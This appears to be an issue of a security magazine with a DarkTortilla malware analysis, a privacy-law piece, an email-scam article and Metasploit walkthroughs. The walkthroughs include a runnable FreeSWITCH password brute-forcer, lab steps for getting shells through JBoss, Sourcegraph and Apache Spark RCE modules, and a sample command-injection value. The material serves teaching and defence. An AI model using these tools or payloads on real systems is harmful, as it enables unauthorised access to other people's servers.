DarkTortilla is delivered much like the other loaders we have seen recently: through spear-phishing or malspam emails. Secureworks observed that the malspam emails delivering DarkTortilla came in various languages, including English, German, Romanian, Spanish, Italian and Bulgarian, and used a logistics-themed lure.

The payload was delivered as an attachment in ISO, zip, img, dmg or tar format (we have seen this in our June 2022 Issue). These archives contained a single executable whose name was the same as the archive's but with a .exe extension. This executable is the initial loader of DarkTortilla.

Malicious documents were also used to deliver DarkTortilla. In these documents, DarkTortilla is usually embedded as a packager shell object. Another method used embedded macros to deliver the crypter.
Contents Of DarkTortilla Crypter

DarkTortilla has two components:

1. A .NET-based initial loader.
2. A .NET-based core processor in DLL form.

CTU researchers observed that the core processor was usually embedded within the .NET resources of the initial loader. In some samples, the loader instead retrieved the encoded core processor from a public paste site such as Pastebin.
"The only way to maintain privacy on the internet is to not be on the internet" - Abhijit Naskar.
Initial Loaders

The initial loader components of the DarkTortilla samples were obfuscated with the DeepSea .NET code obfuscator to hinder analysis of the code, so most of the names are random. The same obfuscator also applies switch-dispatch control-flow obfuscation, which restructures code into switch statements and makes analysis harder still. In addition, the configuration of DarkTortilla is encrypted and stored as bitmap images.

The first thing the initial loader does when executed is check for internet connectivity by issuing HTTP GET requests. If the check fails, the loader keeps repeating it until it has connectivity. Once connected, the loader downloads content from google.com and bing.com. But the main job of the loader is to retrieve the encoded core processor data.

The retrieval method depends on where the encoded core processor data is stored. If the processor data is in the .NET resources of the initial loader binary, the loader uses a hard-coded key to decode it. After decoding the processor data, the loader loads the core processor assembly and executes its entry point.

If the core processor data is hosted on an external site (a public paste site), the loader first decodes the URL where the core processor is hosted. The encoding logic differs between the samples the researchers observed, probably to make detection and analysis harder.

After decoding the URL, the initial loader retrieves an encoded string hosted there. Although the string represents the encoded core processor data, it has been padded with fake XML tags, delimiters made of random letters, and integer values encoded with a shift cipher, to make decoding hard. The loader downloads this data but does not save it on the file system; it only keeps it in memory.

The initial loader decodes this string by first removing the fake XML tags, then converting the string into an array of integers by replacing the random-letter delimiters with one consistent letter and splitting on that letter. The final step is to iterate through the integer array and subtract a pre-defined value. This value again differs between samples.
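The four decoding steps just described are simple enough to reproduce, which is useful when a paste-site blob turns up in a capture and you want the core processor out of it without running the loader. The code below is an added reconstruction written for this article from the description above; it is not DarkTortilla's code, and the filler tag names, the shift value of 13 and the sample bytes are assumptions made for the example.

```python
"""Added example, reconstructed from the description above; it is not
DarkTortilla's code.  The tag names, the shift value and the sample bytes
are assumptions made for the example."""
import random
import re
import string

FAKE_TAGS = ("data", "item", "cfg", "node")   # assumed filler tag names
TAG_RE = re.compile(r"<[^<>]*>")              # strips <tag>, </tag>, <tag/>, <?xml ...?>
LETTER_RE = re.compile(r"[A-Za-z]")

# Constructed stand-in for a decoded core processor: a PE file starts with "MZ".
SAMPLE_BYTES = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"


def decode_core_processor(blob: str, shift: int) -> bytes:
    """Reverse the four steps the loader performs: strip tags, unify the
    random-letter delimiters, split into integers, subtract the shift."""
    no_tags = TAG_RE.sub("", blob)
    unified = LETTER_RE.sub("x", no_tags)
    values = [int(tok) for tok in unified.split("x") if tok]
    out = bytearray()
    for v in values:
        b = v - shift
        if not 0 <= b <= 255:
            # Wrong shift guess, or the blob is not in this format at all
            raise ValueError(f"value {v} is not a shifted byte for shift {shift}")
        out.append(b)
    return bytes(out)


def encode_core_processor(data: bytes, shift: int, rng: random.Random) -> str:
    """Produce a blob in the described format so the decoder can be exercised."""
    parts = []
    for i, b in enumerate(data):
        if i % 4 == 0:                                   # sprinkle fake XML every few values
            parts.append(f"<{rng.choice(FAKE_TAGS)}>")
        parts.append(str(b + shift))
        parts.append(rng.choice(string.ascii_letters))   # random-letter delimiter
    parts.append("</root>")
    return "".join(parts)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check after decoding: a .NET assembly is a PE file and starts with MZ."""
    return data[:2] == b"MZ"


def self_check(seed: int = 1, shift: int = 13) -> bool:
    """Encode the sample with a seeded RNG and confirm the decoder recovers it."""
    blob = encode_core_processor(SAMPLE_BYTES, shift, random.Random(seed))
    return decode_core_processor(blob, shift) == SAMPLE_BYTES


if __name__ == "__main__":
    blob = encode_core_processor(SAMPLE_BYTES, 13, random.Random(1))
    print(blob)
    print(decode_core_processor(blob, 13))
```

Because the subtracted value differs per sample, a practical decoder tries every shift from 0 to 255 and keeps the one whose output starts with MZ; with the range check above, most wrong guesses fail fast instead of producing garbage.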
Core Processor

The core processor contains the primary functionality of DarkTortilla. It is a DLL normally named Deserizialized.dll, SHCore.dll, PVCore.dll or SHcore2.dll. From March 2022, the names of this DLL became more random.

All the configuration required by the core processor is stored in encrypted form inside images. The core processor extracts the encrypted configuration and parses the decrypted data into a structure that can be easily referenced. The core processor has many functions that attackers can configure as they need. Some of the important ones are: Fake Message Box, Melt, Installation, Persistence, RunPE process injection, Anti-VM and Anti-Sandbox.

A newly discovered vulnerability in a Python module could affect over 350,000 Python projects.
1. Fake Message Box
DarkTortilla can be configured to show a message box when it is executed. Threat actors can use this box to fool victims into thinking that a legitimate app is being loaded, while it is actually malware that is running.

2. Melt
If enabled, this feature moves the initial loader executable to the Windows %TEMP% directory.

3. Installation
This option installs DarkTortilla on the system. The installation directory can also be configured by the threat actor.

4. Persistence
You already know what this is.

5. RunPE Process Injection
DarkTortilla can execute its payloads using process injection. With this method, the payload is only executed in memory and is never written to disk.

6. Anti-VM Features
This feature enables DarkTortilla's anti-VM controls. The core processor queries various WMI objects to detect whether it is running in a virtual machine. It also inspects the system's running processes and services for strings associated with VirtualBox, VMware, Hyper-V and so on. If it detects any of these, it terminates the initial loader process immediately.

7. Anti-Sandbox Features
If this feature is enabled, the core processor searches for a process named "sandboxpiercss". If it is present, the process is terminated.
Main Payload

The primary function of the core processor is to process the main payload. As mentioned at the beginning of this article, the payload can be an information stealer or a commodity RAT. DarkTortilla executes the main payload using RunPE process injection, so the main payload resides only in memory.

Attackers are exploiting the recently revealed vulnerability in Atlassian Confluence servers for illicit cryptocurrency mining.
ADDON Packages

The most important feature of DarkTortilla is not its main payload but its addon packages. DarkTortilla can be configured with zero or more payloads in addition to its main payload. These are known as addon packages.

CTU researchers at Secureworks observed addons that include benign decoy documents, additional DarkTortilla payloads, legitimate executables, keyloggers, clipboard stealers and cryptocurrency miners. DarkTortilla can be configured to install these addon packages either in memory or on the system.

Some experts are of the opinion that researchers focused so much on the main payload of DarkTortilla that they ignored the addon packages. This may have further helped DarkTortilla in evading detection.
ANTI-Analysis

DarkTortilla took many measures to avoid detection. CTU researchers observed that the core processor samples of DarkTortilla were obfuscated using the ConfuserEx code obfuscator. Apart from this, specially crafted code was injected into the samples. This code did not affect the normal (malicious) execution of the crypter but inhibited decompiling of the sample by tools like dnSpy.

Researchers also observed code to detect debuggers inside the DarkTortilla sample, but this code was never called. Researchers are not yet sure whether it was added by the author of the crypter or by ConfuserEx itself.

Seven years without detection is a great feat (although a malicious one) for a crypter. But how did DarkTortilla evade detection for so many years? In addition to all the measures its makers took to avoid detection and analysis of its code, it seems DarkTortilla evades detection by getting lost among the many .NET crypters available on the internet. The focus on the main payload and the neglect of the addon packages may also have helped DarkTortilla.

There is one mystery still to be solved about DarkTortilla. Nobody knows how this crypter reached threat actors. "Despite scouring underground marketplaces and forums, we've been unable to find where or how DarkTortilla is being sold," said Rob Pantazopoulos, Security Researcher, Secureworks, in an interview with The Hacker News.
ANTI-Tamper Features

DarkTortilla has several features to stop anyone interfering with its operation. They are:

1. The core processor immediately reruns the subprocess running the main payload if it is terminated.
2. The initial loader executable is rerun immediately if terminated. DarkTortilla achieves this using a secondary .NET-based executable named "WatchDog".
3. The core processor ensures that the dropped WatchDog executable keeps running.
4. The core processor also maintains persistence for the initial loader.
5. The core processor also delays execution at some stages of the process.

For defenders, the WatchDog pairing is itself a detection opportunity: two .NET processes that each respawn the other within seconds of being killed is not a pattern legitimate software produces, and an incident responder who kills only one of them will see it come straight back.

(THE END)
A new US data privacy bill aims to give you more control over information collected about you – and make businesses change how they handle data.

ONLINE SECURITY

(Cont'd From Page 14) state laws specifically regulating facial recognition technology. The preemption provisions, however, are in flux as members of the House continue to negotiate the bill.

ADPPA's national standards provide uniform compliance requirements, serving economic efficiency; but its preemption of most state laws has some scholars concerned, and California opposes its passage.

If preemption stands, any final version of the ADPPA will be the law of the land, limiting states from more firmly protecting their citizens' data privacy.

ADPPA provides for a private right of action, allowing people to sue covered entities who violate their rights under ADPPA. That gives the bill's enforcement mechanisms a big boost, although it has significant restrictions.

The U.S. Chamber of Commerce and the tech industry oppose a private right of action, preferring ADPPA enforcement be restricted to the Federal Trade Commission. But the FTC has far less staff and far fewer resources than U.S. trial attorneys do.

ECPA, for comparison, has a private right of action. It has not overwhelmed courts or businesses, and entities likely comply with ECPA to avoid civil litigation. Plus, courts have honed ECPA's terms, providing clear precedent and understandable compliance guidelines.

The changes to U.S. data privacy law are big, but ADPPA affords much-needed security and data protections to U.S. citizens, and I believe that it is workable with tweaks.

Given how the internet works, data routinely flows across international borders, so many U.S. companies have already built compliance with other nations' laws into their systems. This includes the E.U.'s General Data Protection Regulation – a law similar to the ADPPA. Facebook, for example, provides E.U. citizens with GDPR's protections, but it does not give U.S. citizens those protections, because it is not required to do so.

Congress has done little with data privacy, but ADPPA is poised to change that.

This Article first appeared in The Conversation.

BitDefender released a decryptor for the LockerGoga ransomware in collaboration with Europol, the No More Ransom Project and Zurich law enforcement authorities.
FreeSWITCH, JBoss EAP/AS Remoting, Sourcegraph & Apache Spark

METASPLOIT THIS MONTH

Welcome to Metasploit This Month. Let us learn about the latest exploit modules of Metasploit and how they fare in our tests.

FreeSWITCH Login Module

TARGET: FreeSWITCH    TYPE: Remote    MODULE: Auxiliary    ANTI-MALWARE: NA
FreeSWITCH is a free and open-source application server for real-time communication, WebRTC, telecommunications, video and Voice over IP (VoIP). This module is a login utility that finds the password of the FreeSWITCH event socket service by brute-forcing its login interface. Note that this service does not require a username; login is done purely by supplying a valid password, so a single pass over a wordlist tests every candidate. We tested it on the latest version of FreeSWITCH. Let's set the target first.
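Why a password alone is enough becomes clear from the event socket (ESL) exchange itself: the server greets the client with an auth/request message, the client answers with a single "auth" line, and the reply is either "+OK accepted" or "-ERR invalid". The script below is an added example written for this article, not the Metasploit module's code. The in-process "server" is a constructed stand-in that speaks those three messages so the example runs offline; it is not FreeSWITCH, and the wordlist and the password "hunter" are assumptions taken from the test setup described here.

```python
"""Added example (not the Metasploit module's code): the FreeSWITCH event
socket (ESL) login exchange, which carries only a password, and a wordlist
loop built on it.  The in-process 'server' below is a constructed stand-in
that speaks the same three messages; it is not FreeSWITCH."""
import socket
import threading

ESL_PORT = 8021  # FreeSWITCH's default event socket port


def read_message(sock: socket.socket) -> str:
    """Read one ESL message: header lines terminated by an empty line."""
    buf = b""
    while b"\n\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.decode("utf-8", errors="replace")


def try_password(sock: socket.socket, password: str) -> bool:
    """One attempt: wait for auth/request, send 'auth <pw>', read the reply."""
    greeting = read_message(sock)
    if "Content-Type: auth/request" not in greeting:
        raise RuntimeError(f"unexpected greeting: {greeting!r}")
    sock.sendall(f"auth {password}\n\n".encode())
    reply = read_message(sock)
    return "+OK accepted" in reply   # a failure reads 'Reply-Text: -ERR invalid'


def guess_password(wordlist, connect):
    """Try each candidate on a fresh connection (the server drops failed logins)."""
    for candidate in wordlist:
        with connect() as sock:
            if try_password(sock, candidate):
                return candidate
    return None


# ---- constructed stand-in for the service, only so the example runs offline ----
def fake_esl_server(sock: socket.socket, real_password: str) -> None:
    with sock:
        sock.sendall(b"Content-Type: auth/request\n\n")
        request = read_message(sock).strip()
        if request == f"auth {real_password}":
            sock.sendall(b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n")
        else:
            sock.sendall(b"Content-Type: command/reply\nReply-Text: -ERR invalid\n\n")


def make_local_connector(real_password: str):
    """Return a connect() that hands back a client socket wired to fake_esl_server."""
    def connect() -> socket.socket:
        client, server = socket.socketpair()
        threading.Thread(target=fake_esl_server, args=(server, real_password), daemon=True).start()
        return client
    return connect


if __name__ == "__main__":
    # Against a real host you would instead pass:
    #   connect = lambda: socket.create_connection((host, ESL_PORT), timeout=5)
    found = guess_password(["ClueCon", "changeme", "hunter"], make_local_connector("hunter"))
    print("password:", found)
```

The first candidate in that list is deliberate: "ClueCon" is the password FreeSWITCH ships with, and an event socket reachable from the network with that value still set needs no wordlist at all. On the defensive side the fix is the mirror image of the attack: change the default, and restrict who can reach port 8021, since the protocol itself offers nothing else to slow a guessing loop down.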

The target's ready. Note that we started this FreeSWITCH container with the password set to "hunter". Let's see how this module works. Start Metasploit and load the freeswitch_event_socket_login module.

Set all the required options and execute the module. If you don't set a dictionary, the module uses its default wordlist.

As readers can see, the module successfully cracked the password.
JBoss EAP/AS Remoting RCE Module

TARGET: JBoss AS <= 6.1.0    TYPE: Remote    MODULE: Exploit    ANTI-MALWARE: NA

JBoss is a division of Red Hat that provides support for the WildFly open-source application server (formerly JBoss AS) and related middleware services. JBoss EAP is an enterprise application platform for building, deploying and hosting Java applications and services.

The above-mentioned versions of JBoss have a Java deserialization vulnerability in the Remoting unified invoker interface. We tested this on a JBoss AS 6.1.0 container. Let's set the target first. Create two new files named docker-compose.yml and Dockerfile on Kali Linux. Copy the contents given below into docker-compose.yml.
version: "3"
services:
  web:
    build: .
    ports:
      - "8080:8080"
      - "9990:9990"
      - "4447:4447"
      - "9999:9999"
      - "4446:4446"
      - "3873:3873"
      - "4445:4445"
    networks:
      internet:
        aliases:
          - jboss-as-61
networks:
  internet:
    driver: bridge

Similarly, copy the contents below into the file named Dockerfile.

FROM jboss/base-jdk:8

# Set the JBOSS_HOME env variable
ENV JBOSS_HOME /opt/jboss/jboss-as-6.1
ENV EAP_HOME /opt/jboss/jboss-as-6.1

# Add the JBoss distribution to /opt, and make jboss the owner of the extracted zip content
# https://jbossas.jboss.org/downloads
RUN curl https://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip -o /opt/jboss/jboss-as-6.1.0.zip
RUN jar -xvf /opt/jboss/jboss-as-6.1.0.zip \
    && mv /opt/jboss/jboss-6.1.0.Final $EAP_HOME \
    && chmod a+x $EAP_HOME/bin/*

# Ensure signals are forwarded to the JVM process correctly for graceful shutdown
#ENV LAUNCH_JBOSS_IN_BACKGROUND true

# Enable binding to all network interfaces inside the container
RUN echo "JAVA_OPTS=\"\$JAVA_OPTS -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0\"" >> ${EAP_HOME}/bin/run.conf

# Expose the ports we're interested in
EXPOSE 8080 9990 4447 9999 4446 3873 4445

# Set the default command to run on boot
# This boots JBoss AS 6.1 bound to all interfaces
ENTRYPOINT ["/opt/jboss/jboss-as-6.1/bin/run.sh"]

Let's load the containers.

It is ready as shown below.

The target is ready. Let's see how this module works. Load the JBoss Remoting module.

Set all the required options as shown below and use the check command to see if the target is indeed vulnerable.

The target is indeed vulnerable. Now set the LHOST option and execute the module.

As readers can see, we successfully have a shell with the privileges of the "jboss" user.
Sourcegraph Gitserver Exec RCE Module

TARGET: Sourcegraph    TYPE: Remote    MODULE: Exploit    ANTI-MALWARE: NA

Sourcegraph is a web-based code search and navigation tool for development teams. Almost all versions of Sourcegraph (there is some ambiguity, as some patched versions are also reportedly vulnerable) are vulnerable to unauthenticated RCE in their gitserver component. Commands are executed in the context of the gitserver process. We have tested this on Sourcegraph version 3.36.3. Let's set the target first.

Note that the module only succeeds if there is at least one git repository on the target server. Let's see how to add a repository to this gitserver first. Once the Docker container is live, visit the IP address of the target container on port 7080. That is where the Sourcegraph web interface is running.
Create an account.

Once you are successfully logged in, go to Repositories > Manage code hosts.

Scroll down to find "Generic Git Host" and click on it.

In the "Add a repository" field, add the following code. This JSON snippet adds the Metasploit repository.

{
  "url": "https://github.com/",
  "repos": [
    "rapid7/metasploit-framework.git"
  ]
}
The cloning of the repository takes some time, so be patient. Once the repository has finished cloning, the target is ready.

Load the sourcegraph_gitserver_sshcmd module.
Ransomware-as-a-Service groups have been spotted using Emotet to distribute Quantum and BlackCat ransomware.

Set the RHOSTS option and use the check command to see if the target is indeed vulnerable.

The target is indeed vulnerable. Set the other required options and execute the module.

As readers can see, we successfully have a meterpreter session.
Apache Spark RCE Module

TARGET: Apache Spark 3.0.3 and earlier, 3.1.1 to 3.1.2, 3.2.0 to 3.2.1    TYPE: Remote    MODULE: Exploit    ANTI-MALWARE: NA

Apache Spark is an open source, distributed processing system used for big data workloads. The above-mentioned versions of Apache Spark have a remote code execution vulnerability (CVE-2022-33891). How is this poss­ible?

The Apache Spark UI offers the possibility to enable Access Control Lists (ACLs) for its users. This is done with the configuration option spark.acls.enable. Together with an authentication filter, this option checks whether a user has permission to view or modify the application. If ACLs are enabled, a code path in the HttpSecurityFilter lets a request supply an arbitrary user name to impersonate, and that name reaches a group lookup that builds a Unix shell command around the unix id command and executes it. Because the user name is spliced into the command string unescaped, shell metacharacters in it give command injection. Note that the bug is only reachable when spark.acls.enable is true; it is false by default.

We have tested this on Apache Spark 3.1.1 running as a Docker container. Here is the docker-compose.yml file.
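The flaw is easiest to see as the shell-string pattern next to its fix. The code below is an added example written for this article in Python rather than Spark's Scala; it is not Spark's code, and the user names it uses, the allowlist pattern and the "nobody" account are assumptions made for illustration.

```python
"""Added example (not Spark's code): the shell-string pattern behind
CVE-2022-33891 next to a hardened group lookup.  The user name passed in is
whatever the client put in the request; the ones used below are constructed."""
import re
import subprocess

# POSIX-style user names only; anything else (spaces, ';', '`', '$(', quotes) is rejected.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_safe_username(user: str) -> bool:
    """Allowlist check: True only for names that cannot carry shell syntax."""
    return bool(USERNAME_RE.match(user))


def vulnerable_group_command(user: str) -> list:
    """The flawed pattern: the untrusted name is interpolated into a string that
    a shell will parse, so 'nobody; echo INJECTED' runs a second command."""
    return ["bash", "-c", f"id -Gn {user}"]


def hardened_group_command(user: str) -> list:
    """Allowlist the name, then hand it to id as a single argv element.
    With no shell in the path, metacharacters are just characters."""
    if not is_safe_username(user):
        raise ValueError(f"rejected user name: {user!r}")
    return ["id", "-Gn", user]


def user_groups(user: str, command_builder=hardened_group_command) -> list:
    """Run the lookup and return the group names (empty if the user is unknown)."""
    argv = command_builder(user)
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout.split()


if __name__ == "__main__":
    payload = "nobody; echo INJECTED"
    # With the vulnerable builder the injected echo shows up among the "groups".
    print("vulnerable:", user_groups(payload, vulnerable_group_command))
    try:
        user_groups(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

The argv form alone removes the injection, because nothing between the caller and id ever parses the string as shell; the allowlist is a second layer that also keeps odd but shell-safe input (very long names, upper case, leading digits) from reaching the command at all. Disabling spark.acls.enable takes the whole code path out of reach, but that is a configuration choice, not a fix.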

Samsung has admitted that a data breach exposed details of some of their US customers.

version: '2'
services:
  spark:
    image: docker.io/bitnami/spark:3.1.1
    environment:
      - SPARK_MODE=master
      - SPARK_RPC_AUTHENTICATION_ENABLED=no
      - SPARK_RPC_ENCRYPTION_ENABLED=no
      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
      - SPARK_SSL_ENABLED=no
    ports:
      - '8080:8080'
Let's set the target.

The target's live but not yet ready. Run the following commands in a new terminal to interact with the spark container.

In the container bash session, enter the command shown below.

Use the cat command to check that the spark.acls.enable option is enabled.

Now the target's ready. Load the apache_spark_rce_cve_2022_33891 module.
https://haveibeenpwned.com

Set the RHOSTS option and use the check command to see if the target is vulnerable.

The target is indeed vulnerable. Set the LHOST option and execute the module.

As readers can see, we successfully have a shell.

Follow Hackercool Magazine For Latest Updates
Email Scams Are Getting More Personal - They Even Fool Cybersecurity Experts

EMAIL SECURITY

Gareth Norris, Senior Lecturer, Department of Psychology, Aberystwyth University
Max Elza, Senior Lecturer in Computer Security, Liverpool John Moores University
Oliver Buckley, Associate Professor in Cyber Security, University of East Anglia

We all like to think we're immune to scams. We scoff at emails from an unknown sender offering us £2 million, in exchange for our bank details. But the game has changed and con artists have developed new, chilling tactics. They are taking the personal approach and scouring the internet for all the details they can find about us.

Scammers are getting so good at it that even cybersecurity experts are taken in. One of us (Oliver Buckley) recalls that in 2018 he received an email from the pro-vice chancellor of his university.

This is it, I thought. I'm finally getting recognition from the people at the top. Something wasn't right, though. Why was the pro-vice chancellor using his Gmail address? I asked how I could meet. He needed me to buy 800 pounds worth of iTunes gift cards for him, and all I needed to do was scratch off the back and send him the code. Not wanting to let him down, I offered to pop down to his PA's office and lend him the 5 pound note I had in my wallet. But I never heard back from him.

The infamous "prince of Nigeria" emails are falling out of fashion. Instead, scammers are scouring social media, especially business-related ones like LinkedIn, to target people with tailored messages. The strength of a relationship between two people can be measured by inspecting their posts and comments to each other. In the first quarter of 2022, LinkedIn accounted for 52% of all phishing scams globally.

Psychologists who research obedience to authority know we are more likely to respond to requests from people higher up in our social and professional hierarchies. And fraudsters know it too.

Scammers don't need to spend much time researching corporate structures. "I'm at the conference and my phone ran out of credit. Can you ask XXX to send me report XXX?" runs a typical scam message.

Data from Google Safe Browsing shows there are now nearly 75 times as many phishing sites as there are malware sites on the internet. Almost 20% of all employees are likely to click on phishing email links, and, of those, a staggering 68% go on to enter their credentials on a phishing website.

Globally, email spam cons cost businesses nearly US$20 billion (£17 billion) every year. Business consultant and tax auditor BDO's research found that six out of ten mid-sized businesses in the UK were victims of fraud in 2020, suffering average losses of £245,000.

Targets are normally chosen based on their rank, age or social status. Sometimes, spamming is part of a coordinated cyber attack against a specific organisation, so targets are selected if they work for or have connections to this organisation.

Fraudsters are using spam bots to engage with victims who respond to the initial hook email. The bot uses recent information from LinkedIn and other social media platforms to gain the victim's trust and lure them into giving valuable information or transferring money. This started over the last two to three years with the addition of chatbots to websites to increase interactions with customers. Recent examples include the Royal Mail chatbot scam, DHL Express, and Facebook Messenger. Unfortunately for the public, many companies offer free and paid services to build a chatbot.

And more technical solutions are available for scammers these days to conceal their identities, such as using anonymous communication channels or fake IP addresses.

Social media is making it easier for scammers to craft believable emails called spear phishing. The data we share every day gives fraudsters clues about our lives they can use against us. It could be something as simple as somewhere you recently visited or a website you use. Unlike general phishing (large numbers of spam emails), this nuanced approach exploits our tendency to attach significance to information that has some connection to us. When we check our full inbox, we often pick out something that strikes a chord. This is referred to in psychology as the illusory correlation: seeing things as related when they aren't.

Even if you're tempted to bait email scammers, don't. Even confirming your email address is in use can make you a target for future scams. There is also a more human element to these scams compared with the blanket bombing approach scammers have favoured for the last two decades. It's eerily intimate.

One simple way to avoid being tricked is to double-check the sender's details and email headers. Think about the information that might be out there about you, not just about what you receive and who from. If you have another means of contacting that person, do so.

We should all be careful with our data. The rule of thumb is if you don't want someone to know it, then don't put it online.

The more advanced technology gets, the easier it is to take a human approach. Video call technology and messaging apps bring you closer to your friends and family. But it's giving people who would do you harm a window into your life. So we have to use our human defences: gut instinct. If something doesn't feel right, pay attention.

This Article first appeared in The Conversation.
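"Double-check the sender's details and email headers" can be turned into a handful of mechanical checks that would have caught the pro-vice-chancellor-on-Gmail message above. The script below is an added example written for this magazine; it is not part of the article, and the sample message, the organisation domain example.ac.uk and the free-webmail list are constructed assumptions.

```python
"""Added example (not from the article): header checks that surface the
'senior colleague writing from webmail' pattern described above.  The message
and the organisation domain are constructed for the example."""
import re
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAIN = "example.ac.uk"   # assumption: the organisation's own mail domain
FREEMAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
LURE_RE = re.compile(r"ran out of credit|gift card|urgent", re.I)

# Constructed sample, modelled on the scam message quoted in the article.
SAMPLE_RAW = """\
From: "Prof. A. Example, Pro-Vice Chancellor" <pvc.example.office@gmail.com>
Reply-To: pvc-office-urgent@outlook.com
To: o.buckley@example.ac.uk
Subject: Quick favour
Authentication-Results: mx.example.ac.uk; spf=pass smtp.mailfrom=gmail.com; dkim=pass header.d=gmail.com

I'm at the conference and my phone ran out of credit. Can you pick up some gift cards for me?
"""

CLEAN_RAW = """\
From: "O. Smith" <o.smith@example.ac.uk>
To: o.buckley@example.ac.uk
Subject: Meeting
Authentication-Results: mx.example.ac.uk; spf=pass smtp.mailfrom=example.ac.uk; dkim=pass header.d=example.ac.uk

See you at three.
"""


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def header_warnings(raw: str, org_domain: str = ORG_DOMAIN) -> list:
    """Return human-readable warnings; an empty list means nothing suspicious was found."""
    msg = message_from_string(raw)
    warnings = []
    name, from_addr = parseaddr(msg.get("From", ""))
    from_dom = _domain(from_addr)

    # 1. A colleague's title in the display name but a webmail address underneath.
    if from_dom in FREEMAIL and from_dom != org_domain:
        warnings.append(f"From uses free webmail domain {from_dom} while claiming to be {name!r}")

    # 2. Replies silently diverted to a different mailbox.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_dom:
        warnings.append(f"Reply-To domain {_domain(reply_addr)} differs from From domain {from_dom}")

    # 3. SPF/DKIM only vouch for the domain that sent the mail.  A pass for
    #    gmail.com proves the message came via Gmail, not that the sender is
    #    who the display name says; a fail for our own domain is a red flag.
    auth = msg.get("Authentication-Results", "")
    if from_dom == org_domain and re.search(r"(spf|dkim)=fail", auth):
        warnings.append("SPF/DKIM failure for a message claiming our own domain")
    elif from_dom != org_domain and re.search(r"(spf|dkim)=pass", auth):
        warnings.append(f"authentication passed, but only for {from_dom}, which is not ours")

    # 4. The classic lure: urgency plus a request to relay or pay.
    body = msg.get_payload() if not msg.is_multipart() else ""
    if LURE_RE.search(body):
        warnings.append("body matches known lure phrases")
    return warnings


if __name__ == "__main__":
    for line in header_warnings(SAMPLE_RAW):
        print("-", line)
```

None of these checks is proof on its own, and the third one is the one people get backwards: a green "authenticated" tick on a message from a free webmail domain tells you only that the scammer really does own that Gmail account. The human step the article recommends, contacting the person by another channel, is still the one that settles it.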

DOWNLOADS

1. SharpEvader Script: https://github.com/Xyan1d3/SharpEvader
2. Kali Linux 2022.3: https://www.kali.org/get-kali/

Now, you can also read Hackercool Magazine on Magzter & Zinio.